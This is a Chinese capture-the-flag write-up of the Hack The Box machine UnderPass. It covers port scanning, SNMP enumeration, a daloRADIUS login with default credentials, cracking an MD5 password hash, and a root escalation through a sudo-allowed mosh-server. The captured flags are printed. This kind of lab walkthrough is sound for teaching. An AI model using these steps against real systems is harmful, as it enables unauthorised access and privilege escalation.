当前位置: 首页 > news >正文

HTB:UnderPass[WriteUP]

news 2025/6/28 7:28:24

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用nmap对靶机UDP开放端口进行脚本、服务扫描

使用snmpwalk枚举靶机snmp服务信息

使用feroxbuster对靶机/daloradius路径FUZZ

使用ffuf对该路径再次FUZZ

使用Google检索该WebAPP默认凭证

边界突破

使用上述凭证登入/operators后台

将密码哈希扔进CrackStation尝试解密

使用ssh通过上述凭证登录靶机

权限提升

查看可sudo执行的文件

我尝试查询mosh的使用手册

配合sudo执行服务端文件尝试构造命令提权

连接至HTB服务器并启动靶机

分配IP:10.10.16.22

靶机IP:10.10.11.48

靶机Domain:underpass.htb

信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a underpass.htb -r 1-65535 --ulimit 5000 | tee res

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -p22,80 -sCV -Pn underpass.htb

使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -p22,80 --script=vuln -O -Pn underpass.htb

使用nmap对靶机常用UDP端口进行开放扫描

nmap -sU --top-ports 20 -Pn underpass.htb

使用nmap对靶机UDP开放端口进行脚本、服务扫描
nmap -sU -p161 -sCV -Pn underpass.htb

使用snmpwalk枚举靶机snmp服务信息

snmpwalk -v1 -c public underpass.htb

  • 其中我注意到字符串"UnDerPass.htb is the only daloradius server in the basin!"

使用feroxbuster对靶机/daloradius路径FUZZ

feroxbuster -u 'http://underpass.htb/daloradius' -w ../dictionary/Entire-Dir.txt -t 100 -T 10 -x php asp aspx jsp

  • 由输出结果可见,大部分可访问路径都来自/daloradius/app
使用ffuf对该路径再次FUZZ
ffuf -u 'http://underpass.htb/daloradius/app/FUZZ' -w ../dictionary/Entire-Dir.txt -t 100

  • 使用浏览器访问/users路径

  • 使用浏览器访问/operators路径

使用Google检索该WebAPP默认凭证

账户:administrator

密码:radius

边界突破

使用上述凭证登入/operators后台

  • 点击Management -> List Users可见一份用户凭证

账户:svcMosh

密码哈希:412DD4759978ACFCC81DEAB01B382403

将密码哈希扔进CrackStation尝试解密

账户:svcMosh

密码:underwaterfriends

  • 或者使用john通过字典爆破
john hash --wordlist=../dictionary/rockyou.txt --format=Raw-MD5

使用ssh通过上述凭证登录靶机

ssh svcMosh@underpass.htb

  • /home/svcMosh目录下可见user.txt文件

svcMosh@underpass:~$ ls
user.txt
svcMosh@underpass:~$ pwd
/home/svcMosh
svcMosh@underpass:~$ cat user.txt
8b8b1c902f2bf3f18f74412279ac73b1

权限提升

查看可sudo执行的文件

sudo -l

svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

  • 显然mosh-server是服务端文件,则mosh为客户端文件

我尝试查询mosh的使用手册

mosh -h

  • 由输出可知,连接的命令格式:/usr/bin/mosh [options] [--] [user@]host [command...]
配合sudo执行服务端文件尝试构造命令提权
mosh --server="sudo /usr/bin/mosh-server" localhost
  • 成功连接至本地且提权至root用户

  • /root目录下找到root.txt文件

root@underpass:~# pwd
/root
root@underpass:~# ls
root.txt
root@underpass:~# cat root.txt
9be45072db6a8f849186867a1993cab8

http://www.lryc.cn/news/532650.html

相关文章:

  • 【deepseek实战】绿色好用,不断网
  • MySQL 进阶专题:索引(索引原理/操作/优缺点/B+树)
  • 用NeuralProphet预测股价:AI金融新利器(附源码)
  • 【Elasticsearch】parent aggregation
  • IDEA使用Auto-dev+DeepSeek 10分钟快速集成,让java开发起飞
  • ASP.NET Core中间件Markdown转换器
  • 使用page assist浏览器插件结合deepseek-r1 7b本地模型
  • 【华为OD-E卷 - 108 最大矩阵和 100分(python、java、c++、js、c)】
  • 【Reading Notes】Favorite Articles from 2025
  • 云计算行业分析
  • 【Linux系统】线程:线程的优点 / 缺点 / 超线程技术 / 异常 / 用途
  • 3.攻防世界 weak_auth
  • 代码随想录算法训练营| 二叉树总结
  • Python OCR工具pytesseract识别数字验证码
  • SpringBoot开发(五)SpringBoot接收请求参数
  • 文件基础IO
  • 05vue3实战-----配置项目代码规范
  • 八大排序算法细讲
  • 网络爬虫学习:借助DeepSeek完善爬虫软件,增加停止任务功能
  • docker安装es及分词器ik
  • 【论文阅读】On the Security of “VOSA“
  • Docker 国内最新可用镜像源20250205
  • (2025|ICLR,音频 LLM,蒸馏/ALLD,跨模态学习,语音质量评估,MOS)音频 LLM 可作为描述性语音质量评估器
  • 使用 CSS 实现透明效果
  • 4G核心网的演变与创新:从传统到虚拟化的跨越
  • 数据库系统概论的第六版与第五版的区别,附pdf
  • uniapp小程序自定义中间凸起样式底部tabbar
  • 自己实现的一个缓存数据库(搞着玩) .net Core/6/8/9
  • 在Qt中,slots 关键字有什么用?
  • 如何查看linux机器有几个cpu